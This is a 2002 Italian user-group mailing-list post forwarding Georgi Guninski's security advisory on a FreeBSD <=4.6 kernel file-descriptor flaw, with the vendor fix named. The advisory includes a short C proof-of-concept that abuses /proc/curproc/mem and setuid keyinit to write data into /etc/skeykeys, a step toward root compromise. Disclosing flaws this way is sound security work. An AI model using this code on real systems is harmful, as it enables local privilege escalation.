[LUGIschia] Fwd: FreeBSD <=4.6 kernel problems, yet Linux and *BSD much better than Windows
Giovanni Coppa
giannicoppa@yahoo.it
Mer 31 Lug 2002 20:43:36 CEST
--- Georgi Guninski <guninski@guninski.com> ha
scritto: > From Georgi Guninski Wed Jul 31 04:48:48
2002
> Data: Wed, 31 Jul 2002 14:48:48 +0300
> Da: Georgi Guninski <guninski@guninski.com>
> A: security@guninski.com
> Oggetto: FreeBSD <=4.6 kernel problems, yet Linux
> and *BSD much better than Windows
>
> Georgi Guninski security advisory #56, 2002
>
> FreeBSD <=4.6 kernel problems, yet Linux and *BSD
> much better than Windows
>
> Systems affected:
> FreeBSD <= 4.6
>
> Risk: Probably High
> Date: 31 July 2002
>
> Legal Notice:
> This Advisory is Copyright (c) 2002 Georgi Guninski.
> You may distribute it unmodified.
> You may not modify it and distribute it or
> distribute parts
> of it without the author's written permission.
> If you want to link to this content use the URL:
> http://www.guninski.com/freebsd2.html
>
> Disclaimer:
> The information in this advisory is believed to be
> true though
> it may be false.
> The opinions expressed in this advisory and program
> are my own and
> not of any company. The usual standard disclaimer
> applies,
> especially the fact that Georgi Guninski is not
> liable for any damages
> caused by direct or indirect use of the information
> or functionality
> provided by this advisory or program. Georgi
> Guninski bears no
> responsibility for content or misuse of this
> advisory or program or
> any derivatives thereof.
>
> Description:
> It is possible to inject user supplied input to file
> descriptors 0..2,
> which in some cases (for example if the user is
> permited to do su) may lead
> to root compromise.
>
> Details:
> Several months ago Joost Pol <joost@pine.nl> made
> public almost the same
> problem. FreeBSD fixed it, but the patch does not
> cover all the cases. In
> some cases the kernel closes fds 0..2 after they are
> assigned to /dev/null,
> leaving the system open to an attack. If a +s file
> is execed and fds 0..2
> are opened to /proc/curproc/{special} then the
> kernel forcefully closes
> them and open() then reuses them.
>
> To test whether you are vulnerable, examine the
> following C code:
> -------------------------------
> #define MYFD 2
> while( (f=dup(1)) != -1) ; // eat em up
> close(MYFD); // free a fd
> close(3); // this is sometimes needed because
> execve() fails
> f=open("/proc/curproc/mem",O_WRONLY); // get a fd
> which the kernel will close
> // in a
> bad moment
> if (f==-1) fprintf(stdout,"Error in open /proc\n");
> execl("/usr/bin/keyinit","\n0xcafebabe\n",0);
> -------------------------------
> On a vulnerable system, 0xcafebabe is put into
> /etc/skeykeys
>
> Workaround/Solution:
>
> FreeBSD-SA-02:23.stdio fixes the problem.
>
>
> Vendor status:
> FreeBSD was notified soon. They fixed the issue
> quite fast.
> Actually according to:
>
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&frame=right&th=d429cd2ef1d3a2b7&seekm=ai6c0q%242289%241%40FreeBSD.csie.NCTU.edu.tw#link16
> They seem to have commited the kernel patch I sent
> them.
>
> Regards,
> Georgi Guninski
> http://www.guninski.com
>
>
>
>
>
>
> ----------------------
> You may visit Guninski Security Mailing List page at
> http://www.guninski.com/mailinglist.html
> ----------------------
______________________________________________________________________
Scarica il nuovo Yahoo! Messenger: con webcam, nuove faccine e tante altre novitą.
http://it.yahoo.com/mail_it/foot/?http://it.messenger.yahoo.com/
Maggiori informazioni sulla lista
lugischia